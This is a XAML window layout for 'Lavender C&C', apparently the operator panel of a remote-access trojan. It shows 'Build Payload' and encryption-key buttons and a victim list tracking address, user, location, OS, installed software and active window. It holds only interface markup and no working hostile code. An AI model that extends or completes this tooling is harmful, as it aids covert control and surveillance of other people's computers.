Lavender ControlX/Main.xaml

<Controls:MetroWindow x:Name="MainW" x:Class="Main"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:Lavender_ControlX"
        xmlns:Controls="clr-namespace:MahApps.Metro.Controls;assembly=MahApps.Metro"
        mc:Ignorable="d"
        Title="Lavender C&amp;C" Height="400" Width="750" TitleCaps="False" TitlebarHeight="35" WindowStartupLocation="CenterScreen" Closing="MainWindow_Closing" Activated="MainWindow_Activated">
    <Controls:MetroWindow.RightWindowCommands>
        <Controls:WindowCommands>
            <Button 
                FontFamily="Webdings" 
                FontSize="18" 
                Content="Ñ"
                ToolTip="Manage Encryption Keys"
                CommandParameter="4"/>
            <Button 
                FontFamily="Webdings" 
                FontSize="18" 
                Content="@"
                ToolTip="Build Payload"
                CommandParameter="4"/>
            <Button 
                FontFamily="Webdings" 
                FontSize="18" 
                Content="i"
                ToolTip="About"
                CommandParameter="4"/>
        </Controls:WindowCommands>
    </Controls:MetroWindow.RightWindowCommands>
    <DockPanel Background="#FF252525" HorizontalAlignment="Left" Height="390" LastChildFill="False" VerticalAlignment="Top" Width="745" Margin="0,0,0,-17.5">
        <Grid Height="390" VerticalAlignment="Top" Width="200">

            <Image x:Name="image" HorizontalAlignment="Left" Height="73" VerticalAlignment="Top" Width="200"/>
            <ComboBox Margin="5,78,112,286"></ComboBox>
            <Controls:NumericUpDown Margin="88,78,44,286" HasDecimals="False" Value="92" UpDownButtonsWidth="18" Minimum="0" Maximum="10000"/>
            <Controls:MetroTabControl x:Name="Tabs" Margin="0,109,0,0">
                <Controls:MetroTabItem>
                    <Grid Height="100" Width="100"/>
                </Controls:MetroTabItem>
                <Controls:MetroTabItem></Controls:MetroTabItem>

            </Controls:MetroTabControl>
            <Button x:Name="button" Content="Start" HorizontalAlignment="Left" Margin="158,78,0,0" VerticalAlignment="Top" Width="40" Background="#FF143C25"/>
            <Controls:ProgressRing x:Name="Spinner" Height="25" Margin="165,27,10,338" Width="25"></Controls:ProgressRing>
        </Grid>
        <DockPanel Height="390" LastChildFill="False" VerticalAlignment="Top" Width="Auto" DockPanel.Dock="Top">
            <ListView x:Name="L1" Height="329" VerticalAlignment="Top" DockPanel.Dock="Top">
                <ListView.View>
                    <GridView>
                        <GridViewColumn Header="ID"/>
                        <GridViewColumn Header="Adress"/>
                        <GridViewColumn Header="Computer/User"/>
                        <GridViewColumn Header="Location"/>
                        <GridViewColumn Header="OS"/>
                        <GridViewColumn Header="Software"/>
                        <GridViewColumn Header="Active Window"/>
                    </GridView>
                </ListView.View>
            </ListView>
            <TextBox x:Name="LogTextBox" Height="57" TextWrapping="Wrap" Text="TextBox" VerticalAlignment="Top" DockPanel.Dock="Bottom"/>
        </DockPanel>



    </DockPanel>
</Controls:MetroWindow>
